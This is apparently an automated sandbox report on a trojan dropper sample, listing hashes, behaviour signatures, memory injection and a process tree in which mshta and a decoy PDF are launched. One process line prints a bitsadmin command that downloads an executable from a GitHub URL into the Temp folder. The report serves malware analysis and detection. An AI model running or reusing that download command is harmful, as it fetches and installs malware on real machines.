Analysis
- max time kernel: 122s
- max time network: 127s
- platform: windows7_x64
- resource: win7-20241010-en
- resource tags: arch:x64, arch:x86, image:win7-20241010-en, locale:en-us, os:windows7-x64, system
- submitted: 26/03/2025, 17:26
Tasks
- Static task: static1
- Behavioral task: behavioral1
- Sample: SecuriteInfo.com.Trojan.MulDrop23.34226.30868.14577.exe
- Resource: win7-20241010-en
General
- Target: SecuriteInfo.com.Trojan.MulDrop23.34226.30868.14577.exe
- Size: 100KB
- MD5: 05a3652e22ffa7e85b65473182acb707
- SHA1: 24e4c3464f0c4a3ebf46bd0e8d0a39bd2e9f0a55
- SHA256: 9a97ef498ea1fcbe247efd79e293fcadb8b523c334762dcec53d8fb178e7c807
- SHA512: dd7f6c0d0f8ef063bc67bf08140975b02623e484e492bd93062cc0327ebce9d6d6d6dd7b654ac6e768a3cdd0ef5463674434064c0db8578fd0ab0702e226c4e2
- SSDEEP: 3072:Ku8cDKY2SgVmoXU/F+Vy54GCfcljji03L:K/DVSqE/FYgs6
Malware Config
Signatures
- Download via BitsAdmin (1 TTP, 1 IoC)
  pid  Process
  1976 bitsadmin.exe

- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

- System Location Discovery: System Language Discovery (1 TTP, 3 IoCs)
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  description  ioc                                                          Process
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  mshta.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  AcroRd32.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  bitsadmin.exe

- Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  pid  Process
  1560 AcroRd32.exe

- Suspicious use of SetWindowsHookEx (3 IoCs)
  pid  Process
  1560 AcroRd32.exe
  1560 AcroRd32.exe
  1560 AcroRd32.exe

- Suspicious use of WriteProcessMemory (12 IoCs)
  description                  pid   Process                                                   procid_target
  PID 2368 wrote to memory of 1936  SecuriteInfo.com.Trojan.MulDrop23.34226.30868.14577.exe  30
  PID 2368 wrote to memory of 1936  SecuriteInfo.com.Trojan.MulDrop23.34226.30868.14577.exe  30
  PID 2368 wrote to memory of 1936  SecuriteInfo.com.Trojan.MulDrop23.34226.30868.14577.exe  30
  PID 2368 wrote to memory of 1936  SecuriteInfo.com.Trojan.MulDrop23.34226.30868.14577.exe  30
  PID 2368 wrote to memory of 1560  SecuriteInfo.com.Trojan.MulDrop23.34226.30868.14577.exe  31
  PID 2368 wrote to memory of 1560  SecuriteInfo.com.Trojan.MulDrop23.34226.30868.14577.exe  31
  PID 2368 wrote to memory of 1560  SecuriteInfo.com.Trojan.MulDrop23.34226.30868.14577.exe  31
  PID 2368 wrote to memory of 1560  SecuriteInfo.com.Trojan.MulDrop23.34226.30868.14577.exe  31
  PID 1936 wrote to memory of 1976  mshta.exe                                                 32
  PID 1936 wrote to memory of 1976  mshta.exe                                                 32
  PID 1936 wrote to memory of 1976  mshta.exe                                                 32
  PID 1936 wrote to memory of 1976  mshta.exe                                                 32
Processes
1. C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.MulDrop23.34226.30868.14577.exe
   Command line: "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.MulDrop23.34226.30868.14577.exe"
   PID: 2368
   - Suspicious use of WriteProcessMemory

   2. C:\Windows\SysWOW64\mshta.exe
      Command line: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\successfulpayment.hta"
      PID: 1936
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory

      3. C:\Windows\SysWOW64\bitsadmin.exe
         Command line: "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/ruthmooregmuax/ruthmooregmuax/raw/refs/heads/main/system.exe C:\Users\Admin\AppData\Local\Temp\system.exe
         PID: 1976
         - Download via BitsAdmin
         - System Location Discovery: System Language Discovery

   2. C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
      Command line: "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\successfulpayment.pdf"
      PID: 1560
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: GetForegroundWindowSpam
      - Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 3KB
  MD5: 9ec5722f5c211aa092627523eededaee
  SHA1: acce645d722eb5ca3357abe6f21982fc9d0a7d01
  SHA256: 1c2bc9d43cb50547bea4b7b22f8491ee131fe995ced4fff7dc096535a499de7a
  SHA512: e1604b7c32fa6ff8014096c137f57f27feebd5bc45fbba0128d71346eb3f739397993c4ee4f0b5d9fe9e5be80283218f00a801ccd366fdac0082704eccc9c2d9

- Filesize: 884B
  MD5: 168db1ea9ff342afc28adab5c01bd159
  SHA1: 063357780b0e0a82f36670ce59be818c1eb75012
  SHA256: 1c3a2840f2d8d1730a52f2498c58e86fb6a70199d347cb57e300bb2110ef85e6
  SHA512: 93e87e9f1ef123dc6e476933e08d6d94917c05ef2355eb2f0e75bf6cd832e26a4386742bd66cd7a89c07d832f60f3fba90522cefe92909c03627688c0e5b4cf0

- Filesize: 89KB
  MD5: 609c3fe620acd93745b01a2115dfb2ea
  SHA1: 8552ce163f5bdd8e729091416f961d2e3cff53d1
  SHA256: be1c0ba85aa8a85432f3e8764517a8aec6e34dcbc807f6f122b9f2895ba2b850
  SHA512: 96b9ab8f4fd84980b75760279273d815b7ec16b9ef6a0582c5bb539f3a58a6430f5208089203f341755b0821f3c29144f509b5f285e97bd1af4d9dc9361de344